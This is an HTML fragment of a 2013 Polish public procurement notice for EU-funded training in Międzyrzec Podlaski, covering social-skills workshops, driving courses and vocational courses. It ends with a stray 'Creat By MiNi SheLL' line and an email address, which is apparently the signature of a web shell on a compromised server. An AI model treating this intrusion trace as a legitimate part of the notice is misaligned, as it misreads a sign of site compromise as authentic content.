<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiot zamówienia: Warsztaty kompetencji i umiejętności społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty w zakresie: 	
- trening kompetencji i umiejętności społecznych; wsparcie psychologiczne,
- kształtowania wizerunku,
- edukacji finansowej w zakresie budżetu i prowadzenia gospodarstwa domowego,
- umiejętności poruszania się na rynku pracy, zajęcia z doradcą zawodowym.
Zakres zamówienia:
1. Termin szkolenia: maj - czerwiec 2013 r.
2. Miejsce szkolenia: Międzyrzec Podlaski. Warunki lokalowe, sale szkoleniowe oraz wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż
3. Czas szkolenia: zajęcia od poniedziałku do piątku, z wyłączeniem sobót i niedziel w godzinach 8:00 - 16:00
4. Forma zajęć:
- trening kompetencji i umiejętności społecznych: minimum 8 godz. szkoleniowych (po 45 minut) w grupie x  2 grupy po 14 osób - razem 16 godz. szkoleniowych
- wsparcie psychologiczne: min. 4 godz. szkoleniowe zajęć grupowych x 2 grupy = 8 godz. szkoleniowych oraz min. 1 godz. szkoleniowa konsultacji indywidualnych na osobę x 28 osób = 28 godz. szkoleniowych - razem   36 godz. szkoleniowych
- warsztaty kształtowania wizerunku: min.8 godz. szk. w grupie x 2 grupy po 14 osób - razem 16 godz. szkoleniowych 
- warsztaty edukacji finansowej w zakresie budżetu i prowadzenia gospodarstwa domowego:
- min.8 godz.  szk. w grupie x 2 grupy po 14 osób = 16 godz. szkoleniowych
- warsztaty z zakresu umiejętności poruszania się na rynku pracy: zajęcia grupowe - min. 4 godz. szk. x 2 grupy po 14 osób = 8 godz. szk. oraz konsultacje indywidualne z doradcą zawodowym - min.1 godz. szk. na osobę x 28 osób = 28 godz. szk. Razem 36 godz. szkoleniowych
5. Zapewnienie cateringu na zajęciach (kawa, herbata, woda gazowana i niegazowana, ciastka, obiad dwudaniowy- dania każdego dnia powinny być inne)
6. Liczba uczestników warsztatów: 28 osób (beneficjenci projektu)
7. Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, zapewnienie materiałów biurowych dla wszystkich uczestników szkolenia (materiały szkoleniowe, teczka, notes, długopis, wydanie certyfikatów, zaświadczeń o ukończeniu szkolenia)
8. Przygotowanie raportu ewaluacyjnego szkoleń (opracowanie po stronie wykonawcy)
9. Pełna dokumentacja szkoleń: listy obecności uczestników, arkusze zajęć, raport z hospitacji zajęć szkoleniowych, lista odbioru materiałów szkoleniowych, lista odbioru posiłków, imienne pokwitowanie zwrotu kosztów dojazdu
10. Ubezpieczenie uczestników szkolenia NNW
11. Zwrot kosztów dojazdu stosownie do odległości w cenie najtańszego biletu komunikacji publicznej (odległość dojazdu do 15 km).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiot zamówienia: Kurs prawa jazdy kategorii B, C oraz C+E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia:
1. Przeprowadzenie kursu prawa jazdy kat. B - dla 9 osób
2. Przeprowadzenie kursu prawa jazdy kat. C - dla 4 osób
3. Przeprowadzenie kursu prawa jazdy kat. C+E - dla 1 osoby
4. Wykłady część teoretyczna i praktyczna nauka jazdy zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U.2005.217.1834 z późn zmian.)
5. Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, zapewnienie materiałów biurowych dla wszystkich uczestników szkolenia (materiały szkoleniowe (podręczniki i płyty CD) teczka, notes, długopis, wydanie certyfikatów, zaświadczeń o ukończeniu szkolenia)
6. Badanie lekarskie i badania psychotechniczne ( w przypadku kursu prawa jazdy C i C+E )
7. Przeprowadzenie egzaminu teoretycznego wewnętrznego
8. Opłacenie pierwszego państwowego egzaminu teoretycznego i praktycznego dla uczestników kursu
9. Termin realizacji: maj - sierpień w godz. 8:00 - 16:00 od poniedziałku do piątku  
10. Miejsce realizacji kursu: Międzyrzec Podlaski. Warunki lokalowe, sale szkoleniowe oraz wykorzystywany  sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż
11. Organizator kursu zapewnia: sprzęt niezbędny do przeprowadzenia szkolenia praktycznego            
12. Ubezpieczenie uczestników szkolenia NNW.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot zamówienia: Kursy zawodowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia:
1. Kurs zawodowy Sprzedawca z obsługą komputera i kasy fiskalnej - dla 9 osób w minimalnej liczbie 100 godzin szkoleniowych (po 45 min.) zajęć teoretycznych i praktycznych. Miejsce szkolenia: Międzyrzec Podlaski 
2.	Kurs zawodowy Magazynier - kierowca wózków jezdniowych z napędem silnikowym - dla 5 osób w minimalnej liczbie 100 godzin szkoleniowych (po 45 min) zajęć teoretycznych i praktycznych. Miejsce szkolenia Międzyrzec Podlaski lub dojazd do 30 km od Międzyrzeca Podlaskiego.
3. Kurs zawodowy Kosmetyczka - dla 1 osoby w minimalnej liczbie 160 godzin szkoleniowych (po 45 min) zajęć teoretycznych i praktycznych. Miejsce szkolenia: Międzyrzec Podlaski lub dojazd do 30km od Międzyrzeca Podlaskiego
4. Termin szkolenia czerwiec  - sierpień  2013 r. w godz. 8:00 - 16:00 od poniedziałku do piątku  
5. Ubezpieczenie uczestników szkolenia NNW
6. Zwrot kosztów dojazdu stosownie do odległości w cenie najtańszego biletu komunikacji publicznej (odległość dojazdu do 30 km)
7. Badania lekarskie (tylko wymagane dla poszczególnych kursów)
8. Zapewnienie cateringu na zajęciach (kawa, herbata, woda gazowana i niegazowana, ciastka, obiad  dwudaniowy- dania każdego dnia powinny być inne)
9. Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, zapewnienie materiałów biurowych dla wszystkich uczestników szkolenia (materiały szkoleniowe, teczka, notes, długopis, wydanie certyfikatów, zaświadczeń o ukończeniu szkolenia)
10. Pełna dokumentacja szkoleń: listy obecności uczestników, zaświadczenia o ukończeniu kursu
11. Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt  muszą spełniać wymogi prawne w zakresie BHP i p.poż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com